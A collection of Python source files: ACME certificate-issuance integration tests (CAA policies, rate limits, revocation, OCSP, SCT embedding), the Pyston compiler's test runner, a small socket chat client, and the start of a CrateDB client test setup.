client = chisel2.make_client()
caa_account_uri = client.net.account.uri
caa_records = [
{"domain": "accounturi.good-caa-reserved.com", "value":"{0}; accounturi={1}".format(goodCAA, caa_account_uri)},
{"domain": "dns-01-only.good-caa-reserved.com", "value": "{0}; validationmethods=dns-01".format(goodCAA)},
{"domain": "http-01-only.good-caa-reserved.com", "value": "{0}; validationmethods=http-01".format(goodCAA)},
{"domain": "dns-01-or-http01.good-caa-reserved.com", "value": "{0}; validationmethods=dns-01,http-01".format(goodCAA)},
]
for policy in caa_records:
challSrv.add_caa_issue(policy["domain"], policy["value"])
# TODO(@4a6f656c): Once the `CAAValidationMethods` feature flag is enabled by
# default, remove this early return.
if not CONFIG_NEXT:
return
chisel2.expect_problem("urn:ietf:params:acme:error:caa",
lambda: chisel2.auth_and_issue(["dns-01-only.good-caa-reserved.com"], chall_type="http-01"))
chisel2.expect_problem("urn:ietf:params:acme:error:caa",
lambda: chisel2.auth_and_issue(["http-01-only.good-caa-reserved.com"], chall_type="dns-01"))
## Note: the additional names are to avoid rate limiting...
chisel2.auth_and_issue(["dns-01-only.good-caa-reserved.com", "www.dns-01-only.good-caa-reserved.com"], chall_type="dns-01")
chisel2.auth_and_issue(["http-01-only.good-caa-reserved.com", "www.http-01-only.good-caa-reserved.com"], chall_type="http-01")
chisel2.auth_and_issue(["dns-01-or-http-01.good-caa-reserved.com", "dns-01-only.good-caa-reserved.com"], chall_type="dns-01")
chisel2.auth_and_issue(["dns-01-or-http-01.good-caa-reserved.com", "http-01-only.good-caa-reserved.com"], chall_type="http-01")
## CAA should fail with an arbitrary account, but succeed with the CAA client.
chisel2.expect_problem("urn:ietf:params:acme:error:caa", lambda: chisel2.auth_and_issue(["accounturi.good-caa-reserved.com"]))
chisel2.auth_and_issue(["accounturi.good-caa-reserved.com"], client=client)
def test_account_update():
"""
Create a new ACME client/account with one contact email. Then update the
account to a different contact emails.
"""
emails=("initial-email@not-example.com", "updated-email@not-example.com", "another-update@not-example.com")
client = chisel2.make_client(email=emails[0])
for email in emails[1:]:
result = chisel2.update_email(client, email=email)
# We expect one contact in the result
if len(result.body.contact) != 1:
raise(Exception("\nUpdate account failed: expected one contact in result, got 0"))
# We expect it to be the email we just updated to
actual = result.body.contact[0]
if actual != "mailto:"+email:
raise(Exception("\nUpdate account failed: expected contact %s, got %s" % (email, actual)))
def test_renewal_exemption():
"""
Under a single domain, issue one certificate, then two renewals of that
certificate, then one more different certificate (with a different
subdomain). Since the certificatesPerName rate limit in testing is 2 per 90
days, and the renewals should be discounted under the renewal exemption,
each of these issuances should succeed. Then do one last issuance that we
expect to be rate limited, just to check that the rate limit is actually 2,
and we are testing what we think we are testing. See
https://letsencrypt.org/docs/rate-limits/ for more details.
"""
base_domain = random_domain()
# First issuance
chisel2.auth_and_issue(["www." + base_domain])
# First Renewal
chisel2.auth_and_issue(["www." + base_domain])
# Second Renewal
chisel2.auth_and_issue(["www." + base_domain])
# Issuance of a different cert
chisel2.auth_and_issue(["blog." + base_domain])
# Final, failed issuance, for another different cert
chisel2.expect_problem("urn:ietf:params:acme:error:rateLimited",
lambda: chisel2.auth_and_issue(["mail." + base_domain]))
def test_certificates_per_name():
chisel2.expect_problem("urn:ietf:params:acme:error:rateLimited",
lambda: chisel2.auth_and_issue([random_domain() + ".lim.it"]))
def test_oversized_csr():
# Number of names is chosen to be one greater than the configured RA/CA maxNames
numNames = 101
# Generate numNames subdomains of a random domain
base_domain = random_domain()
domains = [ "{0}.{1}".format(str(n),base_domain) for n in range(numNames) ]
# We expect issuing for these domains to produce a malformed error because
# there are too many names in the request.
chisel2.expect_problem("urn:ietf:params:acme:error:malformed",
lambda: chisel2.auth_and_issue(domains))
def parse_cert(order):
return x509.load_pem_x509_certificate(order.fullchain_pem.encode(), default_backend())
def test_admin_revoker_cert():
cert_file = temppath('test_admin_revoker_cert.pem')
order = chisel2.auth_and_issue([random_domain()], cert_output=cert_file.name)
parsed_cert = parse_cert(order)
# Revoke certificate by serial
reset_akamai_purges()
run(["./bin/admin-revoker", "serial-revoke",
"--config", "%s/admin-revoker.json" % config_dir,
'%x' % parsed_cert.serial_number, '1'])
# Wait for OCSP response to indicate revocation took place
verify_ocsp(cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002", "revoked")
verify_akamai_purge()
def test_admin_revoker_batched():
serialFile = tempfile.NamedTemporaryFile(
dir=tempdir, suffix='.test_admin_revoker_batched.serials.hex',
mode='w+', delete=False)
cert_files = [
temppath('test_admin_revoker_batched.%d.pem' % x) for x in range(3)
]
for cert_file in cert_files:
order = chisel2.auth_and_issue([random_domain()], cert_output=cert_file.name)
serialFile.write("%x\n" % parse_cert(order).serial_number)
serialFile.close()
run(["./bin/admin-revoker", "batched-serial-revoke",
"--config", "%s/admin-revoker.json" % config_dir,
serialFile.name, '0', '2'])
for cert_file in cert_files:
verify_ocsp(cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002", "revoked")
def test_sct_embedding():
order = chisel2.auth_and_issue([random_domain()])
cert = parse_cert(order)
# make sure there is no poison extension
try:
cert.extensions.get_extension_for_oid(x509.ObjectIdentifier("1.3.6.1.4.1.11129.2.4.3"))
raise(Exception("certificate contains CT poison extension"))
except x509.ExtensionNotFound:
# do nothing
pass
# make sure there is a SCT list extension
try:
sctList = cert.extensions.get_extension_for_oid(x509.ObjectIdentifier("1.3.6.1.4.1.11129.2.4.2"))
except x509.ExtensionNotFound:
raise(Exception("certificate doesn't contain SCT list extension"))
if len(sctList.value) != 2:
raise(Exception("SCT list contains wrong number of SCTs"))
for sct in sctList.value:
if sct.version != x509.certificate_transparency.Version.v1:
raise(Exception("SCT contains wrong version"))
if sct.entry_type != x509.certificate_transparency.LogEntryType.PRE_CERTIFICATE:
raise(Exception("SCT contains wrong entry type"))
delta = sct.timestamp - datetime.datetime.now()
if abs(delta) > datetime.timedelta(hours=1):
raise(Exception("Delta between SCT timestamp and now was too great "
"%s vs %s (%s)" % (sct.timestamp, datetime.datetime.now(), delta)))
def test_auth_deactivation():
client = chisel2.make_client(None)
d = random_domain()
csr_pem = chisel2.make_csr([d])
order = client.new_order(csr_pem)
resp = client.deactivate_authorization(order.authorizations[0])
if resp.body.status is not messages.STATUS_DEACTIVATED:
raise Exception("unexpected authorization status")
order = chisel2.auth_and_issue([random_domain()], client=client)
resp = client.deactivate_authorization(order.authorizations[0])
if resp.body.status is not messages.STATUS_DEACTIVATED:
raise Exception("unexpected authorization status")
def get_ocsp_response_and_reason(cert_file, issuer_file, url):
"""Returns the ocsp response output and revocation reason."""
output = verify_ocsp(cert_file, issuer_file, url, None)
m = re.search('Reason: (\w+)', output)
reason = m.group(1) if m is not None else ""
return output, reason
ocsp_resigning_setup_data = {}
@register_twenty_days_ago
def ocsp_resigning_setup():
"""Issue and then revoke a cert in the past.
Useful setup for test_ocsp_resigning, which needs to check that the
revocation reason is still correctly set after re-signing and old OCSP
response.
"""
client = chisel2.make_client(None)
cert_file = temppath('ocsp_resigning_setup.pem')
order = chisel2.auth_and_issue([random_domain()], client=client, cert_output=cert_file.name)
cert = OpenSSL.crypto.load_certificate(
OpenSSL.crypto.FILETYPE_PEM, order.fullchain_pem)
# Revoke for reason 1: keyCompromise
client.revoke(josepy.ComparableX509(cert), 1)
ocsp_response, reason = get_ocsp_response_and_reason(
cert_file.name, "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002")
global ocsp_resigning_setup_data
ocsp_resigning_setup_data = {
'cert_file': cert_file.name,
'response': ocsp_response,
'reason': reason
}
def test_ocsp_resigning():
"""Check that, after re-signing an OCSP, the reason is still set."""
if 'response' not in ocsp_resigning_setup_data:
raise Exception("ocsp_resigning_setup didn't run")
tries = 0
while tries < 5:
resp, reason = get_ocsp_response_and_reason(
ocsp_resigning_setup_data['cert_file'], "/tmp/intermediate-cert-rsa-a.pem", "http://localhost:4002")
if resp != ocsp_resigning_setup_data['response']:
break
tries += 1
time.sleep(0.25)
else:
raise(Exception("timed out waiting for re-signed OCSP response for certificate"))
if reason != ocsp_resigning_setup_data['reason']:
raise(Exception("re-signed ocsp response has different reason %s expected %s" % (
reason, ocsp_resigning_setup_data['reason'])))
if reason != "keyCompromise":
raise(Exception("re-signed ocsp response has wrong reason %s" % reason))
|
tester.py
|
# Copyright (c) 2014-2015 Dropbox, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/env python
import Queue
import argparse
import cPickle
import datetime
import functools
import glob
import os
import re
import resource
import shutil
import signal
import subprocess
import sys
import tempfile
import threading
import time
NUM_THREADS = 1
IMAGE = "pyston_dbg"
KEEP_GOING = False
FN_JUST_SIZE = 20
EXTRA_JIT_ARGS = []
TIME_LIMIT = 25
TESTS_TO_SKIP = []
EXIT_CODE_ONLY = False
SKIP_FAILING_TESTS = False
VERBOSE = 1
PYTHONIOENCODING = 'utf-8'
# For fun, can test pypy.
# Tough because the tester will check to see if the error messages are exactly the
# same as the system CPython, but the error messages change over micro CPython versions.
# Pyston compile-time checks the system CPython version to try to give compatible error messages.
TEST_PYPY = 0
def set_ulimits():
# Guard the process from running too long with a hard rlimit.
# But first try to kill it after a second with a SIGALRM, though that's catchable/clearable by the program:
signal.alarm(TIME_LIMIT)
resource.setrlimit(resource.RLIMIT_CPU, (TIME_LIMIT + 1, TIME_LIMIT + 1))
MAX_MEM_MB = 100
resource.setrlimit(resource.RLIMIT_RSS, (MAX_MEM_MB * 1024 * 1024, MAX_MEM_MB * 1024 * 1024))
EXTMODULE_DIR = None
EXTMODULE_DIR_PYSTON = None
THIS_FILE = os.path.abspath(__file__)
_global_mtime = None
def get_global_mtime():
global _global_mtime
if _global_mtime is not None:
return _global_mtime
# Start off by depending on the tester itself
rtn = os.stat(THIS_FILE).st_mtime
assert os.listdir(EXTMODULE_DIR), EXTMODULE_DIR
for fn in os.listdir(EXTMODULE_DIR):
if not fn.endswith(".so"):
continue
rtn = max(rtn, os.stat(os.path.join(EXTMODULE_DIR, fn)).st_mtime)
_global_mtime = rtn
return rtn
def get_expected_output(fn):
sys.stdout.flush()
assert fn.endswith(".py")
expected_fn = fn[:-3] + ".expected"
if os.path.exists(expected_fn):
return 0, open(expected_fn).read(), ""
cache_fn = fn[:-3] + ".expected_cache"
if os.path.exists(cache_fn):
cache_mtime = os.stat(cache_fn).st_mtime
if cache_mtime > os.stat(fn).st_mtime and cache_mtime > get_global_mtime():
try:
return cPickle.load(open(cache_fn))
except (EOFError, ValueError):
pass
# TODO don't suppress warnings globally:
env = dict(os.environ)
env["PYTHONPATH"] = EXTMODULE_DIR
env["PYTHONIOENCODING"] = PYTHONIOENCODING
p = subprocess.Popen(["python", "-Wignore", fn], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=open("/dev/null"), preexec_fn=set_ulimits, env=env)
out, err = p.communicate()
code = p.wait()
r = code, out, err
assert code >= 0, "CPython exited with an unexpected exit code: %d" % (code,)
cPickle.dump(r, open(cache_fn, 'w'))
return r
def canonicalize_stderr(stderr):
"""
For a while we were trying to maintain *exact* stderr compatibility with CPython,
at least for the last line of the stderr.
It was starting to get silly to do this, so instead apply some "canonicalizations"
to map certain groups of error messages together.
"""
stderr = stderr.strip().split('\n')[-1]
substitutions = [
("NameError: global name '", "NameError: name '"),
("AttributeError: '(\w+)' object attribute '(\w+)' is read-only", "AttributeError: \\2"),
(r"TypeError: object.__new__\(\) takes no parameters", "TypeError: object() takes no parameters"),
("IndexError: list assignment index out of range", "IndexError: list index out of range"),
(r"unqualified exec is not allowed in function '(\w+)' it (.*)",
r"unqualified exec is not allowed in function '\1' because it \2"),
]
for pattern, subst_with in substitutions:
stderr = re.sub(pattern, subst_with, stderr)
return stderr
failed = []
class Options(object): pass
# returns a single string, or a tuple of strings that are spliced together (with spaces between) by our caller
def run_test(fn, check_stats, run_memcheck):
opts = get_test_options(fn, check_stats, run_memcheck)
del check_stats, run_memcheck
if opts.skip:
return "(skipped: %s)" % opts.skip
env = dict(os.environ)
env["PYTHONPATH"] = EXTMODULE_DIR_PYSTON
env["PYTHONIOENCODING"] = PYTHONIOENCODING
run_args = [os.path.abspath(IMAGE)] + opts.jit_args + [fn]
start = time.time()
p = subprocess.Popen(run_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=open("/dev/null"),
preexec_fn=set_ulimits, env=env)
out, stderr = p.communicate()
code = p.wait()
elapsed = time.time() - start
if code >= 128:
code -= 256
return determine_test_result(fn, opts, code, out, stderr, elapsed)
def get_test_options(fn, check_stats, run_memcheck):
opts = Options()
opts.check_stats = check_stats
opts.run_memcheck = run_memcheck
opts.statchecks = []
opts.jit_args = ["-rq"] + EXTRA_JIT_ARGS
opts.collect_stats = True
opts.expected = "success"
opts.should_error = False
opts.allow_warnings = []
opts.skip = None
for l in open(fn):
l = l.strip()
if not l:
continue
if not l.startswith("#"):
break
if l.startswith("# statcheck:"):
l = l[len("# statcheck:"):].strip()
opts.statchecks.append(l)
elif l.startswith("# run_args:"):
l = l[len("# run_args:"):].split()
opts.jit_args += l
elif l.startswith("# expected:"):
opts.expected = l[len("# expected:"):].strip()
elif l.startswith("# should_error"):
opts.should_error = True
elif l.startswith("# fail-if:"):
condition = l.split(':', 1)[1].strip()
if eval(condition):
opts.expected = "fail"
elif l.startswith("# skip-if:"):
skip_if = l[len("# skip-if:"):].strip()
if eval(skip_if):
opts.skip = "skip-if: %s" % skip_if[:30]
elif l.startswith("# allow-warning:"):
opts.allow_warnings.append("Warning: " + l.split(':', 1)[1].strip())
elif l.startswith("# no-collect-stats"):
opts.collect_stats = False
if not opts.skip:
# consider other reasons for skipping file
if SKIP_FAILING_TESTS and opts.expected == 'fail':
opts.skip = 'expected to fail'
elif os.path.basename(fn).split('.')[0] in TESTS_TO_SKIP:
opts.skip = 'command line option'
assert opts.expected in ("success", "fail", "statfail"), opts.expected
if TEST_PYPY:
opts.jit_args = []
opts.collect_stats = False
opts.check_stats = False
opts.expected = "success"
if opts.collect_stats:
opts.jit_args = ['-s'] + opts.jit_args
return opts
def diff_output(expected, received, expected_file_prefix, received_file_prefix):
exp_fd, exp_fn = tempfile.mkstemp(prefix=expected_file_prefix)
rec_fd, rec_fn = tempfile.mkstemp(prefix=received_file_prefix)
os.fdopen(exp_fd, 'w').write(expected)
os.fdopen(rec_fd, 'w').write(received)
p = subprocess.Popen(["diff", "--unified=5", "-a", exp_fn, rec_fn], stdout=subprocess.PIPE, preexec_fn=set_ulimits)
diff = p.stdout.read()
assert p.wait() in (0, 1)
os.unlink(exp_fn)
os.unlink(rec_fn)
return diff
def determine_test_result(fn, opts, code, out, stderr, elapsed):
if opts.allow_warnings:
out_lines = []
for l in out.split('\n'):
for regex in opts.allow_warnings:
if re.match(regex, l):
break
else:
out_lines.append(l)
out = "\n".join(out_lines)
stats = None
if opts.collect_stats:
stats = {}
have_stats = (stderr.count("Stats:") == 1 and stderr.count("(End of stats)") == 1)
if code >= 0:
assert have_stats
if have_stats:
assert stderr.count("Stats:") == 1
stderr, stats_str = stderr.split("Stats:")
stats_str, stderr_tail = stats_str.split("(End of stats)\n")
stderr += stderr_tail
other_stats_str, counter_str = stats_str.split("Counters:")
for l in counter_str.strip().split('\n'):
assert l.count(':') == 1, l
k, v = l.split(':')
stats[k.strip()] = int(v)
last_stderr_line = stderr.strip().split('\n')[-1]
if EXIT_CODE_ONLY:
# fools the rest of this function into thinking the output is OK & just checking the exit code.
# there oughtta be a cleaner way to do this.
expected_code, expected_out, expected_err = 0, out, stderr
else:
# run CPython to get the expected output
expected_code, expected_out, expected_err = get_expected_output(fn)
color = 31 # red
if code != expected_code:
if code == 0:
err = "(Unexpected success)"
else:
err = last_stderr_line
if code == -signal.SIGALRM:
msg = "Timed out"
color = 33 # yellow
elif code == -signal.SIGKILL:
msg = "Killed!"
else:
msg = "Exited with code %d (expected code %d)" % (code, expected_code)
if opts.expected == "fail":
return "Expected failure (got code %d, should be %d)" % (code, expected_code)
elif KEEP_GOING:
failed.append(fn)
if VERBOSE >= 1:
return "\033[%dmFAILED\033[0m (%s)\n%s" % (color, msg, stderr)
else:
return "\033[%dmFAILED\033[0m (%s)" % (color, msg)
else:
raise Exception("%s\n%s\n%s" % (msg, err, stderr))
elif opts.should_error == (code == 0):
if code == 0:
msg = "Exited successfully; remove '# should_error' if this is expected"
else:
msg = "Exited with code %d; add '# should_error' if this is expected" % code
if KEEP_GOING:
failed.append(fn)
return "\033[%dmFAILED\033[0m (%s)" % (color, msg)
else:
# show last line of stderr so we have some idea went wrong
print "Last line of stderr: " + last_stderr_line
raise Exception(msg)
elif out != expected_out:
if opts.expected == "fail":
return "Expected failure (bad output)"
else:
diff = diff_output(expected_out, out, "expected_", "received_")
if KEEP_GOING:
failed.append(fn)
if VERBOSE >= 1:
return "\033[%dmFAILED\033[0m (bad output)\n%s" % (color, diff)
else:
return "\033[%dmFAILED\033[0m (bad output)" % (color,)
else:
raise Exception("Failed on %s:\n%s" % (fn, diff))
elif not TEST_PYPY and canonicalize_stderr(stderr) != canonicalize_stderr(expected_err):
if opts.expected == "fail":
return "Expected failure (bad stderr)"
else:
diff = diff_output(expected_err, stderr, "expectederr_", "receivederr_")
if KEEP_GOING:
failed.append(fn)
if VERBOSE >= 1:
return "\033[%dmFAILED\033[0m (bad stderr)\n%s" % (color, diff)
else:
return "\033[%dmFAILED\033[0m (bad stderr)" % (color,)
else:
raise Exception((canonicalize_stderr(stderr), canonicalize_stderr(expected_err)))
elif opts.expected == "fail":
if KEEP_GOING:
failed.append(fn)
return "\033[31mFAILED\033[0m (unexpected success)"
raise Exception("Unexpected success on %s" % fn)
r = ("Correct output (%5.1fms)" % (elapsed * 1000,),)
if opts.check_stats:
def noninit_count(s):
return stats.get(s, 0) - stats.get("_init_" + s, 0)
for l in opts.statchecks:
test = eval(l)
if not test:
if opts.expected == "statfail":
r += ("(expected statfailure)",)
break
elif KEEP_GOING:
failed.append(fn)
return r + ("\033[31mFailed statcheck\033[0m",)
else:
m = re.match("""stats\[['"]([\w_]+)['"]]""", l)
if m:
statname = m.group(1)
raise Exception((l, statname, stats[statname]))
m = re.search("""noninit_count\(['"]([\w_]+)['"]\)""", l)
if m:
statname = m.group(1)
raise Exception((l, statname, noninit_count(statname)))
raise Exception((l, stats))
else:
# only can get here if all statchecks passed
if opts.expected == "statfail":
if KEEP_GOING:
failed.append(fn)
return r + ("\033[31mUnexpected statcheck success\033[0m",)
else:
raise Exception(("Unexpected statcheck success!", statchecks, stats))
else:
r += ("(ignoring stats)",)
if opts.run_memcheck:
if code == 0:
start = time.time()
p = subprocess.Popen(["valgrind", "--tool=memcheck", "--leak-check=no"] + run_args, stdout=open("/dev/null", 'w'), stderr=subprocess.PIPE, stdin=open("/dev/null"))
out, err = p.communicate()
assert p.wait() == 0
if "Invalid read" not in err:
elapsed = (time.time() - start)
r += ("Memcheck passed (%4.1fs)" % (elapsed,),)
else:
if KEEP_GOING:
failed.append(fn)
return r + ("\033[31mMEMCHECKS FAILED\033[0m",)
else:
raise Exception(err)
else:
r += ("(Skipping memchecks)",)
return r
q = Queue.Queue()
cv = threading.Condition()
results = {}
quit = {}
def worker_thread():
while not quit:
try:
job = q.get()
if job is None:
break
results[job[0]] = run_test(*job)
with cv:
cv.notifyAll()
except:
import traceback
# traceback.print_exc()
quit[job[0]] = job[0] + ':\n' + traceback.format_exc()
results[job[0]] = None
with cv:
cv.notifyAll()
# os._exit(-1)
def fileSize(fn):
return os.stat(fn).st_size
# return len(list(open(fn)))
# our arguments
parser = argparse.ArgumentParser(description='Runs Pyston tests.')
parser.add_argument('-m', '--run-memcheck', action='store_true', help='run memcheck')
parser.add_argument('-j', '--num-threads', metavar='N', type=int, default=NUM_THREADS,
help='number of threads')
parser.add_argument('-k', '--keep-going', default=KEEP_GOING, action='store_true',
help='keep going after test failure')
parser.add_argument('-R', '--image', default=IMAGE,
help='the executable to test (default: %s)' % IMAGE)
parser.add_argument('-K', '--no-keep-going', dest='keep_going', action='store_false',
help='quit after test failure')
parser.add_argument('-a', '--extra-args', default=[], action='append',
help="additional arguments to pyston (must be invoked with equal sign: -a=-ARG)")
parser.add_argument('-t', '--time-limit', type=int, default=TIME_LIMIT,
help='set time limit in seconds for each test')
parser.add_argument('-s', '--skip-tests', type=str, default='',
help='tests to skip (comma-separated)')
parser.add_argument('-e', '--exit-code-only', action='store_true',
help="only check exit code; don't run CPython to get expected output to compare against")
parser.add_argument('--skip-failing', action='store_true',
help="skip tests expected to fail")
parser.add_argument('--order-by-mtime', action='store_true',
help="order test execution by modification time, instead of file size")
parser.add_argument('test_dir')
parser.add_argument('pattern', nargs='*')
def main(orig_dir):
global KEEP_GOING
global IMAGE
global EXTRA_JIT_ARGS
global TIME_LIMIT
global TEST_DIR
global FN_JUST_SIZE
global TESTS_TO_SKIP
global EXIT_CODE_ONLY
global SKIP_FAILING_TESTS
global VERBOSE
global EXTMODULE_DIR_PYSTON
global EXTMODULE_DIR
run_memcheck = False
opts = parser.parse_args()
run_memcheck = opts.run_memcheck
NUM_THREADS = opts.num_threads
IMAGE = os.path.join(orig_dir, opts.image)
KEEP_GOING = opts.keep_going
EXTRA_JIT_ARGS += opts.extra_args
TIME_LIMIT = opts.time_limit
TESTS_TO_SKIP = opts.skip_tests.split(',')
TESTS_TO_SKIP = filter(bool, TESTS_TO_SKIP) # "".split(',') == ['']
EXIT_CODE_ONLY = opts.exit_code_only
SKIP_FAILING_TESTS = opts.skip_failing
TEST_DIR = os.path.join(orig_dir, opts.test_dir)
EXTMODULE_DIR_PYSTON = os.path.abspath(os.path.dirname(os.path.realpath(IMAGE)) + "/test/test_extension/")
EXTMODULE_DIR = os.path.abspath(os.path.dirname(os.path.realpath(IMAGE)) + "/test/test_extension/build/lib.linux-x86_64-2.7/")
patterns = opts.pattern
if not patterns and not TESTS_TO_SKIP:
TESTS_TO_SKIP = ["t", "t2"]
assert os.path.isdir(TEST_DIR), "%s doesn't look like a directory with tests in it" % TEST_DIR
if TEST_DIR.rstrip('/').endswith("cpython") and not EXIT_CODE_ONLY:
print >>sys.stderr, "Test directory name ends in cpython; are you sure you don't want --exit-code-only?"
# do we need this any more?
IGNORE_STATS = ["%s/%d.py" % (TEST_DIR, i) for i in ()] + []
tests = [t for t in glob.glob("%s/*.py" % TEST_DIR)]
LIB_DIR = os.path.join(sys.prefix, "lib/python2.7")
for t in tests:
bn = os.path.basename(t)
assert bn.endswith(".py")
module_name = bn[:-3]
if os.path.exists(os.path.join(LIB_DIR, module_name)) or \
os.path.exists(os.path.join(LIB_DIR, module_name + ".py")) or \
module_name in sys.builtin_module_names:
raise Exception("Error: %s hides builtin module '%s'" % (t, module_name))
if patterns:
filtered_tests = []
for t in tests:
if any(re.match(os.path.join(TEST_DIR, p) + ".*\.py", t) for p in patterns):
filtered_tests.append(t)
tests = filtered_tests
if not tests:
print >>sys.stderr, "No tests matched the given patterns. OK by me!"
# this can happen legitimately in e.g. `make check_test_foo` if test_foo.py is a CPython regression test.
sys.exit(0)
FN_JUST_SIZE = max(20, 2 + max(len(os.path.basename(fn)) for fn in tests))
if TEST_PYPY:
IMAGE = '/usr/local/bin/pypy'
if not patterns:
if opts.order_by_mtime:
tests.sort(key=lambda fn:os.stat(fn).st_mtime, reverse=True)
else:
tests.sort(key=fileSize)
for fn in tests:
check_stats = fn not in IGNORE_STATS
q.put((fn, check_stats, run_memcheck))
threads = []
for i in xrange(NUM_THREADS):
t = threading.Thread(target=worker_thread)
t.setDaemon(True)
t.start()
threads.append(t)
q.put(None)
for fn in tests:
with cv:
while fn not in results:
try:
cv.wait(1)
except KeyboardInterrupt:
print >>sys.stderr, "Interrupted"
sys.exit(1)
if results[fn] is None:
assert quit
print quit.pop(fn).strip()
for fn, s in quit.items():
print "(%s also failed)" % fn
sys.exit(1)
break
name = os.path.basename(fn).rjust(FN_JUST_SIZE)
msgs = results[fn]
if isinstance(msgs,str):
msgs = [msgs]
print ' '.join([name] + list(msgs))
for t in threads:
t.join()
if failed:
sys.exit(1)
if __name__ == "__main__":
origdir = os.getcwd()
tmpdir = tempfile.mkdtemp()
os.chdir(tmpdir)
try:
main(origdir)
finally:
shutil.rmtree(tmpdir)
# adding a comment here to invalidate cached expected results
|
reciver.py
|
import socket
from os import popen
from multiprocessing import Process
s = socket.socket()
ip=(popen("hostname -I | awk '{print $1}'").read()).strip()
port = 15450
b = "\033[35m"
w = "\033[0m"
for i in range(100):
temip=ip[:-1]+str(i)
try:
s.connect((temip, port))
break
except (ConnectionRefusedError,OSError):
pass
print("connection successful!")
while True:
def recive():
while True:
cmd=s.recv(1024).decode()
print(b+cmd+"\n"+w)
if cmd == "exit server":
s.close()
p1 = Process(target = recive)
p1.start()
x=""
while x!="exit server":
x=input()
s.send(x.encode())
s.close()
|
tests.py
|
# -*- coding: utf-8; -*-
#
# Licensed to CRATE Technology GmbH ("Crate") under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. Crate licenses
# this file to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may
# obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# However, if you have executed another commercial license agreement
# with Crate these terms will supersede the license and you may use the
# software solely pursuant to the terms of the relevant commercial agreement.
from __future__ import absolute_import
import json
import os
import unittest
import doctest
from pprint import pprint
from datetime import datetime, date
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
import time
import threading
import logging
from crate.testing.layer import CrateLayer
from crate.testing.tests import crate_path, docs_path
from crate.client import connect
from crate.client.sqlalchemy.dialect import CrateDialect
from . import http
from .test_cursor import CursorTest
from .test_connection import ConnectionTest
from .test_http import (
HttpClientTest,
ThreadSafeHttpClientTest,
KeepAliveClientTest,
ParamsTest,
RetryOnTimeoutServerTest,
RequestsCaBundleTest,
TestUsernameSentAsHeader,
TestDefaultSchemaHeader,
)
from .sqlalchemy.tests import test_suite as sqlalchemy_test_suite
from .sqlalchemy.types import ObjectArray
log = logging.getLogger('crate.testing.layer')
ch = logging.StreamHandler()
ch.setLevel(logging.ERROR)
log.addHandler(ch)
def cprint(s):
if isinstance(s, bytes):
s = s.decode('utf-8')
print(s)
class ClientMocked(object):
active_servers = ["http://localhost:4200"]
def __init__(self):
self.response = {}
self._server_infos = ("http://localhost:4200", "my server", "0.42.0")
def sql(self, stmt=None, parameters=None, bulk_parameters=None):
return self.response
def server_infos(self, server):
return self._server_infos
def set_next_response(self, response):
self.response = response
def set_next_server_infos(self, server, server_name, version):
self._server_infos = (server, server_name, version)
def close(self):
pass
def setUpMocked(test):
test.globs['connection_client_mocked'] = ClientMocked()
settings = {
'udc.enabled': 'false',
'lang.js.enabled': 'true',
'auth.host_based.enabled': 'true',
'auth.host_based.config.0.user': 'crate',
'auth.host_based.config.0.method': 'trust',
'auth.host_based.config.98.user': 'trusted_me',
'auth.host_based.config.98.method': 'trust',
'auth.host_based.config.99.user': 'me',
'auth.host_based.config.99.method': 'password',
}
crate_port = 44209
crate_transport_port = 44309
local = '127.0.0.1'
crate_layer = CrateLayer('crate',
crate_home=crate_path(),
port=crate_port,
host=local,
transport_port=crate_transport_port,
settings=settings)
crate_host = "{host}:{port}".format(host=local, port=crate_port)
crate_uri = "http://%s" % crate_host
def refresh(table):
with connect(crate_host) as conn:
cursor = conn.cursor()
cursor.execute("refresh table %s" % table)
def setUpWithCrateLayer(test):
test.globs['HttpClient'] = http.Client
test.globs['crate_host'] = crate_host
test.globs['pprint'] = pprint
test.globs['print'] = cprint
test.globs["refresh"] = refresh
with connect(crate_host) as conn:
cursor = conn.cursor()
with open(docs_path('testing/testdata/mappings/locations.sql')) as s:
stmt = s.read()
cursor.execute(stmt)
stmt = ("select count(*) from information_schema.tables "
"where table_name = 'locations'")
cursor.execute(stmt)
assert cursor.fetchall()[0][0] == 1
data_path = docs_path('testing/testdata/data/test_a.json')
# load testing data into crate
cursor.execute("copy locations from ?", (data_path,))
# refresh location table so imported data is visible immediately
cursor.execute("refresh table locations")
# create blob table
cursor.execute("create blob table myfiles clustered into 1 shards " +
"with (number_of_replicas=0)")
# create users
cursor.execute("CREATE USER me WITH (password = 'my_secret_pw')")
cursor.execute("CREATE USER trusted_me")
def setUpCrateLayerAndSqlAlchemy(test):
setUpWithCrateLayer(test)
import sqlalchemy as sa
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
with connect(crate_host) as conn:
cursor = conn.cursor()
cursor.execute("""create table characters (
id string primary key,
name string,
quote string,
details object,
more_details array(object),
INDEX name_ft using fulltext(name) with (analyzer = 'english'),
INDEX quote_ft using fulltext(quote) with (analyzer = 'english')
) """)
with connect(crate_host) as conn:
cursor = conn.cursor()
cursor.execute("""create table cities (
name string primary key,
coordinate geo_point,
area geo_shape
) """)
engine = sa.create_engine('crate://{0}'.format(crate_host))
Base = declarative_base()
class Location(Base):
__tablename__ = 'locations'
name = sa.Column(sa.String, primary_key=True)
kind = sa.Column(sa.String)
date = sa.Column(sa.Date, default=date.today)
datetime = sa.Column(sa.DateTime, default=datetime.utcnow)
nullable_datetime = sa.Column(sa.DateTime)
nullable_date = sa.Column(sa.Date)
